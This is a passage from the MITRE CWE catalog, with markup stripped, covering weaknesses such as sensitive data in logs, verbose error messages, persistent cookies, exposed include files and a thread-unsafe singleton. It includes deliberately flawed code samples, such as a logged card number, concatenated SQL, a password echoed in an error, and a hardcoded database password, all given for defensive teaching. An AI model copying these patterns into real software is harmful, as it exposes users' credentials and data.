(e.g. server.log). This can give information on whatever application left the file. Usually this can give full path names and system information, and sometimes usernames and passwords. + log files that are used for debugging + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + Operation + + + Medium + + + Confidentiality + Read Application Data + Logging sensitive user data often provides attackers with an additional, less-protected path to acquiring the information. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + Consider seriously the sensitivity of the information written into log files. Do not write secrets into the log files. + + + Distribution + Remove debug log files before deploying the application into production. + + + Operation + Protect log files against unauthorized read/write. + + + Implementation + Adjust configurations appropriately when software is transitioned from a debug state to production. + + + + + In the following code snippet, a user's full name and credit card number are written to a log file. + + logger.info("Username: " + usernme + ", CCN: " + ccn); + + + + This code stores location information about the current user: + + locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation()); + ... + + catch (Exception e) {AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage("Sorry, this application has experienced an error.");AlertDialog alert = builder.create();alert.show();Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString());} + + When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. + + + In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. + + public BankAccount getUserBankAccount(String username, String accountNumber) { + BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; + } + + The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. + + + + + CVE-2017-9615 + verbose logging stores admin credentials in a world-readablelog file + https://www.cve.org/CVERecord?id=CVE-2017-9615 + + + CVE-2018-1999036 + SSH password for private key stored in build log + https://www.cve.org/CVERecord?id=CVE-2018-1999036 + + + + + FIO13-J + Do not log sensitive information outside a trust boundary + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Description, Likelihood_of_Exploit, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Name, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Fortify Software + 2009-07-15 + Portions of Mitigations, Consequences and Description derived from content submitted by Fortify Software. + + Information Leak Through Log Files + Information Exposure Through Log Files + Inclusion of Sensitive Information in Log Files + + + + This entry has been deprecated because its abstraction was too low-level. See CWE-532. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Affected_Resources, Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Server Log Files + Information Exposure Through Server Log Files + + + + This entry has been deprecated because its abstraction was too low-level. See CWE-532. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Debug Log Files + Information Exposure Through Debug Log Files + + + + A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system. + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Shell Error Message + Information Exposure Through Shell Error Message + + + + A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + The error message may contain the location of the file in which the offending function is located. This may disclose the web root's absolute path as well as give the attacker the location of application files or configuration information. It may even disclose the portion of code that failed. In many cases, an attacker can use the data to launch further attacks against the system. + + + + + The following servlet code does not catch runtime exceptions, meaning that if such an exception were to occur, the container may display potentially dangerous information (such as a full stack trace). + + public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + String username = request.getParameter("username"); + + // May cause unchecked NullPointerException. + if (username.length() < 10) {...} + } + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Servlet Runtime Error Message + Information Exposure Through Servlet Runtime Error Message + + + + In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system. + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Implementation + Do not expose sensitive error information to the user. + + + + + In the following Java example the class InputFileRead enables an input file to be read using a FileReader object. In the constructor of this class a default input file path is set to some directory on the local file system and the method setInputFile must be called to set the name of the input file to be read in the default directory. The method readInputFile will create the FileReader object and will read the contents of the file. If the method setInputFile is not called prior to calling the method readInputFile then the File object will remain null when initializing the FileReader object. A Java RuntimeException will be raised, and an error message will be output to the user. + + public class InputFileRead { + + private File readFile = null;private FileReader reader = null;private String inputFilePath = null;private final String DEFAULT_FILE_PATH = "c:\\somedirectory\\"; + public InputFileRead() {inputFilePath = DEFAULT_FILE_PATH;} + public void setInputFile(String inputFile) { + + + /* Assume appropriate validation / encoding is used and privileges / permissions are preserved */ + + + } + public void readInputFile() { + try {reader = new FileReader(readFile);...} catch (RuntimeException rex) {System.err.println("Error: Cannot open input file in the directory " + inputFilePath);System.err.println("Input file has not been set, call setInputFile method before calling readInputFile"); + + } catch (FileNotFoundException ex) {...} + + } + } + + However, the error message output to the user contains information regarding the default directory on the local file system. This information can be exploited and may lead to unauthorized access or use of the system. Any Java RuntimeExceptions that are handled should not expose sensitive information to the user. + + + In the example below, the BankManagerLoginServlet servlet class will process a login request to determine if a user is authorized to use the BankManager Web service. The doPost method will retrieve the username and password from the servlet request and will determine if the user is authorized. If the user is authorized the servlet will go to the successful login page. Otherwise, the servlet will raise a FailedLoginException and output the failed login message to the error page of the service. + + public class BankManagerLoginServlet extends HttpServlet { + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + try { + + + // Get username and password from login page request + String username = request.getParameter("username");String password = request.getParameter("password"); + // Authenticate user + BankManager bankMgr = new BankManager();boolean isAuthentic = bankMgr.authenticateUser(username, password); + // If user is authenticated then go to successful login page + if (isAuthentic) {request.setAttribute("login", new String("Login Successful."));getServletContext().getRequestDispatcher("/BankManagerServiceLoggedIn.jsp"). forward(request, response);}else { + + + // Otherwise, raise failed login exception and output unsuccessful login message to error page + throw new FailedLoginException("Failed Login for user " + username + " with password " + password); + } + } catch (FailedLoginException ex) { + + + // output failed login message to error page + request.setAttribute("error", new String("Login Error"));request.setAttribute("message", ex.getMessage());getServletContext().getRequestDispatcher("/ErrorPage.jsp").forward(request, response); + } + } + + + + However, the output message generated by the FailedLoginException includes the user-supplied password. Even if the password is erroneous, it is probably close to the correct password. Since it is printed to the user's page, anybody who can see the screen display will be able to see the password. Also, if the page is cached, the password might be written to disk. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Java Runtime Error Message + Information Exposure Through Java Runtime Error Message + + + + The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. + + + + + + + + + Implementation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Files or Directories + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Operation + System Configuration + Do not expose file and directory information to the user. + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness. + There is a close relationship with CWE-552, which is more focused on weaknesses. As a result, it may be more appropriate to convert CWE-538 to a category. + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Type + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Maintenance_Notes, Name + + + Veracode + 2010-09-09 + Suggested OWASP Top Ten mapping + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + File and Directory Information Leaks + File and Directory Information Exposure + + + + The web application uses persistent cookies, but the cookies contain sensitive information. + Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser's memory and are not stored anywhere, but persistent cookies are stored on the browser's hard drive. This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed. + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Do not store sensitive information in persistent cookies. + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Persistent Cookies + Information Exposure Through Persistent Cookies + + + + The product accepts path input in the form of trailing backslash ('filedir\') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-0847 + ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." + https://www.cve.org/CVERecord?id=CVE-2004-0847 + + + + + filedir\ (trailing backslash) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Trailing Backslash - (filedir\) + + + + Source code on a web server or repository often contains sensitive information and should generally not be accessible to users. + There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Architecture and Design + System Configuration + Recommendations include removing this script from the web server and moving it to a location not accessible from the Internet. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Source Code + Information Exposure Through Source Code + + + + If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Architecture and Design + Do not store sensitive information in include files. + + + Architecture and Design + System Configuration + Protect include files from being exposed. + + + + + The following code uses an include file to store database credentials: + database.inc + + <?php$dbName = 'usersDB';$dbPassword = 'skjdh#67nkjd3$3$';?> + + login.php + + <?phpinclude('database.inc');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?> + + If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Include Source Code + Information Exposure Through Include Source Code + + + + This entry has been deprecated because its abstraction was too low-level. See CWE-532. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Cleanup Log Files + Information Exposure Through Cleanup Log Files + + + + The product uses the singleton pattern when creating a resource within a multithreaded environment. + The use of a singleton pattern may not be thread-safe. + + + + + + + + + + + + Implementation + + + + + Other + Integrity + Other + Modify Application Data + + + + + Architecture and Design + Use the Thread-Specific Storage Pattern. See References. + + + Implementation + Do not use member fields to store information in the Servlet. In multithreading environments, storing user data in Servlet member fields introduces a data access race condition. + + + Implementation + Avoid using the double-checked locking pattern in language versions that cannot guarantee thread safety. This pattern may be used to avoid the overhead of a synchronized call, but in certain versions of Java (for example), this has been shown to be unsafe because it still introduces a race condition (CWE-209). + Limited + + + + + This method is part of a singleton pattern, yet the following singleton() pattern is not thread-safe. It is possible that the method will create two objects instead of only one. + + private static NumberConverter singleton;public static NumberConverter get_singleton() {if (singleton == null) {singleton = new NumberConverter();}return singleton;} + + Consider the following course of events: + + + + Thread A enters the method, finds singleton to be null, begins the NumberConverter constructor, and then is swapped out of execution. + + + Thread B enters the method and finds that singleton remains null. This will happen if A was swapped out during the middle of the constructor, because the object reference is not set to point at the new object on the heap until the object is fully initialized. + + + Thread B continues and constructs another NumberConverter object and returns it while exiting the method. + + + Thread A continues, finishes constructing its NumberConverter object, and returns its version. + + + + At this point, the threads have created and returned two different objects. + + + + + MSC07-J + Prevent multiple instantiations of singleton objects + + + SFP19 + Missing Lock + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + 